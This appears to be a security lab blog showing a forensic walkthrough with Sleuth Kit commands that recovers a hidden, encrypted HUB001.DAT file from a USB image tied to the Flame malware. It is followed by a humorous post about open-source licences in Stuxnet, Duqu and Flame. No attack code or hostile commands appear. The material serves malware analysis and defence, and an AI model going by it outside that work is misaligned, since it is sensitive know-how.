v/v 3368675: MBR
v/v 3368676:
v/v 3368677: FAT2
d/d 3368678:

But given
# istat ./usb1 2
Directory Entry: 2
File Attributes: Directory
Size: 1024

Directory Entry Times:
Written: Thu Jan 1 01:00:00 1970
Accessed: Thu Jan 1 01:00:00 1970
Created: Thu Jan 1 01:00:00 1970

1680 1681

So if not file 2, then maybe 3, 4?

It’s surely not what we are looking for.

istat ./usb1 4
Directory Entry: 4
File Attributes: File, Hidden, System, Archive
Size: 172032
Name: HUB001.DAT

Directory Entry Times:
Written: Tue Jun 12 22:13:50 2012
Accessed: Tue Jun 12 00:00:00 2012
Created: Thu Jan 1 01:00:00 1970

1682 1683 1684 1685 1686 1687 1688 1689
1690 1691 1692 1693 1694 1695 1696 1697
1698 1699 1700 1701 1702 1703 1704 1705
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1850 1851 1852 1853 1854 1855 1856 1857
1858 1859 1860 1861 1862 1863 1864 1865
1866 1867 1868 1869 1870 1871 1872 1873
1874 1875 1876 1877 1878 1879 1880 1881
1882 1883 1884 1885 1886 1887 1888 1889
1890 1891 1892 1893 1894 1895 1896 1897
1898 1899 1900 1901 1902 1903 1904 1905
1906 1907 1908 1909 1910 1911 1912 1913
1914 1915 1916 1917 1918 1919 1920 1921
1922 1923 1924 1925 1926 1927 1928 1929
1930 1931 1932 1933 1934 1935 1936 1937
1938 1939 1940 1941 1942 1943 1944 1945
1946 1947 1948 1949 1950 1951 1952 1953
1954 1955 1956 1957 1958 1959 1960 1961
1962 1963 1964 1965 1966 1967 1968 1969
1970 1971 1972 1973 1974 1975 1976 1977
1978 1979 1980 1981 1982 1983 1984 1985
1986 1987 1988 1989 1990 1991 1992 1993
1994 1995 1996 1997 1998 1999 2000 2001
2002 2003 2004 2005 2006 2007 2008 2009
2010 2011 2012 2013 2014 2015 2016 2017

Remember the size from the dir command?

HUB001.DAT? :

00d2020: 4855 4230 3031 2020 4441 5426 0000 0000 HUB001 DAT&....
00d2030: 0000 cc40 0000 b9b1 cc40 0300 00a0 0200 ...@.....@......

Yes. But even ifind could cheat us:

ifind -a -n "HUB001.DAT" ./usb1

But fsstat shows the 336 sectors (of standard 512 bytes) we are looking for:

FAT CONTENTS (in sectors)

1680-1681 (2) -> EOF
1682-2017 (336) -> EOF

So Let’s do:

icat-sleuthkit ./usb1 4 >hub001.dat

-rw-r--r-- 1 root root 172032 Jun 12 22:53 hub001.dat

xxd hub001.dat |less
0000000: 217a 30e6 280c b557 da53 ce11 28b5 60ea !z0.(..W.S..(.`.
0000010: 07ea 8282 ea2e b5b5 eaea eabb eaea eaea ................

Ok, It’s encrypted. Get the skywiper techrep for reference! It’s like Figure 24 on Encryption E1.

After decryption:

0000000000: 53 51 4C 69 74 65 20 66 │ 6F 72 6D 61 74 20 33 00 SQLite format 3
0000000010: 10 00 01 01 00 40 20 20 │ 00 00 00 38 00 00 00 00 ► ☺☺ @ 8
0000000020: 00 00 00 00 00 00 00 00 │ 00 00 00 0D 00 00 00 03 ♪ ♥
0000000030: 00 00 00 00 00 00 00 0E │ 00 00 00 01 00 00 00 00 ♫ ☺
0000000040: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00

Seems ok, confirmed. Thanks again for Bitdefender for the great job.

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Stuxnet-Duqu-Flame open source license questions v0

Dear All,
As You know, the recent nation-sponsored attacks used a bunch of libraries. However, nobody investigated yet the license terms. Here is a short list, based on the feedbacks we might update this article


modified LZO for .zdata: LZO and the LZO algorithms and implementations are distributed under the terms of the GNU General Public License (GPL) .


putty -MIT license
libbz2 – BSD-style license
zlib – very permissive license
SQLite – public domain
Lua – MIT license

As we are after a long-long day of serious problems, let’s go for some nice and easy point.

So our questions is: Please, Dear Authors of Duqu (whoever they are), hand over the source code of Duqu (or Beacon/NYT), as it contains GPL code.

The source code can be sent to
Discussion on the topic is highly welcome.

Thank you for your attention.

Disclaimer: This post is for fun, don’t take it too seriously, but the questions are still valid. This post is a personal post of one of the Lab members and does not reflect the view of any organization.